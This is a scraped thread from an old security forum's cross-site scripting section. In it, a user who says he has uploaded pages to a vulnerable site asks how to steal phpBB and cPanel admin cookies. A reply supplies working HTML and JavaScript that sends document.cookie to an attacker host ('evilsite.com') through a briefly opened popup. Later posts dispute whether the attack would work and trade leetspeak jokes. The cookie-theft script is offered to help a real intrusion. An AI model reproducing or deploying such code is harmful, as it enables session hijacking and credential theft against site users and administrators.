 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 69
 Members: 0
 Total: 69
|
|
|
|
|
|
Full disclosure |
|
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
again cookie stealin' |
|
 Posted: Fri Oct 01, 2004 8:49 pm |
 |
|
| Roberto |
| Regular user |
 |
|
| Joined: Sep 01, 2004 |
| Posts: 8 |
|
|
|
 |
|
 |
|
i manage to upload html page(in another words javascripts ) to a vulnerable site.
the bug is not related with phpbb.but i manage to upload.
i may direct people to that uploaded page,it is easy
but what should i write to the uploaded page so i can steal phpbb cookies of that site?or admin cookie of the cpanel of that site?
of course i will upload an evil script to my site.
thanks again |
|
|
|
|
| Posted: Sun Dec 12, 2004 12:13 pm |
|
|
| Oguz |
| Regular user |
|
|
| Joined: Nov 29, 2004 |
| Posts: 7 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| Posted: Sun Dec 12, 2004 1:55 pm |
|
|
| Heintz |
| Valuable expert |
|
|
| Joined: Jun 12, 2004 |
| Posts: 88 |
| Location: Estonia/Sweden |
|
|
|
|
|
|
there are very many ways you could do it i'll write here one from which
you can make a better one.
html 1
| Code: |
<html>
<head>
<title>reperdalaj</title>
<script language="JavaScript" src="foo.js"></script>
</head>
<body>
hi i'm evil page!
</body>
</html>
|
foo.js 1
| Code: |
var query = "www.evilsite.com/script.php?string=" + document.cookie;
var nWindow = window.open(query,'nwin','height=1;width=1');
nWindow.close();
|
this loads a popup window for very short time.
after remembering that there are pop-up blockers this will not probably work on many users.
you could make a frame instead and join the html and js, learning html and basic javascript helps. so take your time and google.  |
|
_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!" |
|
|
|
|
Re: again cookie stealin' |
|
| Posted: Sat Dec 18, 2004 3:59 pm |
|
|
| emrag |
| Regular user |
|
|
| Joined: Jun 03, 2004 |
| Posts: 20 |
| Location: TURKEY |
|
|
|
|
|
|
| Roberto wrote: | i manage to upload html page(in another words javascripts ) to a vulnerable site.
the bug is not related with phpbb.but i manage to upload.
i may direct people to that uploaded page,it is easy
but what should i write to the uploaded page so i can steal phpbb cookies of that site?or admin cookie of the cpanel of that site?
of course i will upload an evil script to my site.
thanks again |
i think this isn't possible so you want a phpbb's cookie but there is no XSS in it. you can't get a site's cookie with another site's XSS. |
|
|
|
|
| Posted: Sun Feb 27, 2005 8:48 pm |
|
|
| Alkaen |
| Regular user |
 |
|
| Joined: Feb 16, 2005 |
| Posts: 5 |
| Location: Bahrain - Aldair |
|
|
|
|
|
|
Y35 7h46'5 r!9h7 wh47 emrag $4!d.. y0u c4n7 937 a
$!73'5 C00k!3$ w!7h 4n07h3r $!73'5 X55.
41k43n |
|
_________________
Alkaen with u.. |
|
|
|
| Posted: Fri Mar 04, 2005 6:20 am |
|
|
| HaCkZataN |
| Regular user |
|
|
| Joined: Feb 23, 2005 |
| Posts: 11 |
|
|
|
|
|
|
|
| Alkaen wrote: | Y35 7h46'5 r!9h7 wh47 emrag $4!d.. y0u c4n7 937 a
$!73'5 C00k!3$ w!7h 4n07h3r $!73'5 X55.
41k43n |
i did get shit
lol of course i got that but plz write neat thats ricicule** |
|
|
|
|
| Posted: Tue Dec 05, 2006 7:43 pm |
|
|
| faifas |
| Regular user |
|
|
| Joined: Feb 25, 2005 |
| Posts: 8 |
|
|
|
|
|
|
|
| HaCkZataN wrote: | | Alkaen wrote: | Y35 7h46'5 r!9h7 wh47 emrag $4!d.. y0u c4n7 937 a
$!73'5 C00k!3$ w!7h 4n07h3r $!73'5 X55.
41k43n |
i did get shit
lol of course i got that but plz write neat thats ricicule** |
3 = e
5 = s
$ = 5 = s
etc. |
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
